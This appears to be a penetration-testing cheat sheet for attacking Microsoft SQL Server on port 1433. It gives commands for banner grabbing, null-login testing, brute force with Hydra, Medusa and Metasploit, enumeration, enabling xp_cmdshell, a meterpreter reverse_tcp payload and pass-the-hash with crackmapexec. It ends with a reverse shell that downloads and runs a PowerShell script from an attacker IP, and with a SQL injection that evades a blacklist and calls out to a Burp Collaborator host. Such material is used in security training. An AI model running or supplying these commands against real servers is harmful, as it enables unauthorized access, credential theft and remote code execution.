MSSQL (Microsoft SQL Server) - Port 1433

Basic info

MSSQL is designed to store and retrieve data as requested by applications. Its features include:

• Default Port: TCP/1433 for standard communication.

• Authentication Modes:

  • Windows Authentication

  • Mixed Mode (Windows and SQL Server Authentication)

• Common Uses:

  • Data storage for web applications, enterprise systems, and reporting services.

While MSSQL provides robust security features, misconfigurations, weak authentication, and unpatched vulnerabilities can expose it to attacks.

Banner Grabbing

Banner grabbing helps identify the MSSQL server version, authentication modes, and potential vulnerabilities.

Tools and Commands:

1. Telnet (basic connection test):

   Copy

   telnet <IP> 1433

2. Nmap:

   Copy

   nmap -sV -p 1433 --script ms-sql-info <IP>

   Example Output:

   Copy

   1433/tcp open ms-sql-s Microsoft SQL Server 2019 RTM

3. Metasploit Framework:

   Copy

   msfconsole
   use auxiliary/scanner/mssql/mssql_ping
   set RHOSTS <IP>
   run

Authentication Bypass Techniques

Null Authentication

If SQL Server is misconfigured, it may allow unauthenticated access:

1. Testing Null Authentication:

   Copy

   sqsh -S <IP> -U "" -P ""

MSSQL Brute Force Attacks

Brute force attacks can help identify weak or default credentials.

1. Hydra:

   Copy

   hydra -L usernames.txt -P passwords.txt mssql://<IP>

2. Medusa:

   Copy

   medusa -h <IP> -u <username> -P passwords.txt -M mssql

3. Metasploit Auxiliary Module:

   Copy

   msfconsole
   use auxiliary/scanner/mssql/mssql_login
   set RHOSTS <IP>
   set USER_FILE usernames.txt
   set PASS_FILE passwords.txt
   run

MSSQL Enumeration

Key Enumeration Techniques:

1. Identify Databases:

   Copy

   SELECT name FROM sys.databases;

2. List Users:

   Copy

   SELECT name FROM sys.syslogins;

3. Server Information:

   Copy

   SELECT @@version;

4. Extract Privileges:

   Copy

   SELECT * FROM fn_my_permissions(NULL, 'DATABASE');

Automated Enumeration:

• Metasploit:

  Copy

  use auxiliary/admin/mssql/mssql_enum
  set RHOSTS <IP>
  run

Exploitation Techniques

Command Execution via xp_cmdshell

xp_cmdshell allows executing OS commands from SQL Server.

1. Enable xp_cmdshell:

   Copy

   EXEC sp_configure 'show advanced options', 1;
   RECONFIGURE;
   EXEC sp_configure 'xp_cmdshell', 1;
   RECONFIGURE;

2. Execute Commands:

   Copy

   EXEC xp_cmdshell 'whoami';

Privilege Escalation

Use known vulnerabilities or misconfigurations to escalate privileges:

1. CVE-2020-0618 (SQL Reporting Services RCE): Exploit unpatched SQL Reporting Services.

2. Metasploit Module for Privilege Escalation:

   Copy

   use exploit/windows/mssql/mssql_payload
   set RHOST <IP>
   set PAYLOAD windows/meterpreter/reverse_tcp
   set LHOST <your_IP>
   run

Execute OS Commands

Note that in order to be able to execute commands it's not only necessary to have xp_cmdshell enabled, but also have the EXECUTE permission on the xp_cmdshell stored procedure. You can get who (except sysadmins) can use xp_cmdshell with:

Use master
EXEC sp_helprotect 'xp_cmdshell'
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —